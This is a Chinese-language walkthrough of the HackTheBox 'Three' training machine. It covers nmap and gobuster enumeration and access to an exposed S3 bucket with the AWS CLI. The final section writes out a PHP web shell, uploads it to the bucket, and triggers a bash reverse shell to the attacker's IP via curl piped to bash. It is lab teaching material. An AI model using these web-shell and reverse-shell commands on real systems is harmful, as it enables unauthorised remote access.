HackTheBox Three

TASK 1

有多少个 TCP 端口是开放的？

nmap -sT -A 4 10.129.206.61

TASK 2

网站“联系方式”部分提供的电子邮件地址的域名是什么？

访问网站，找联系方式部分就行。

TASK 3

在没有 DNS 服务器的情况下，我们可以使用哪个 Linux 文件将主机名解析为 IP 地址，以便能够访问指向这些主机名的网站？

直接添加IP 域名到/etc/hosts文件即可

TASK 4

在进一步枚举期间发现了哪个子域？

gobuster vhost -w /usr/share/dnsenum/dns.txt -u http://thetoppers.htb/

TASK 5

哪个服务在发现的子域上运行？

TASK 6

哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互？

TASK 7

哪个命令用于设置 AWS CLI 安装？

aws configure #安装awscli并进行配置

TASK 8

上述实用程序用于列出所有 S3 存储桶的命令是什么？

aws s3 ls --endpoint=http://s3.thetoppers.htb/ #列出所有 s3 存储桶

TASK 9

此服务器配置为运行以哪种 Web 脚本语言编写的文件？

aws s3 ls --endpoint=http://s3.thetoppers.htb/ s3://thetoppers.htb #列出该s3存储桶下的内容

echo '<?php system($_GET["cmd"]);?>' > shell.php   #写一个执行系统命令的后门

aws s3 cp shell.php --endpoint=http://s3.thetoppers.htb/ s3://thetoppers.htb  #上传后门到s3存储桶

aws s3 rm --endpoint=http://s3.thetoppers.htb/ s3://thetoppers.htb/shell.php  #删除s3存储桶下的shell.php文件

通过curl执行bash脚本反弹shell

vi bash.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.148/9999 0>&1  #这里的IP是tun

python3 -m http.server 80  #开启http服务

nc -lvnp 9999  #监听

浏览器执行：http://thetoppers.htb/shell.php?cmd=curl 10.10.14.148/bash.sh | bash

flag

flag.txt文件在/var/www目录下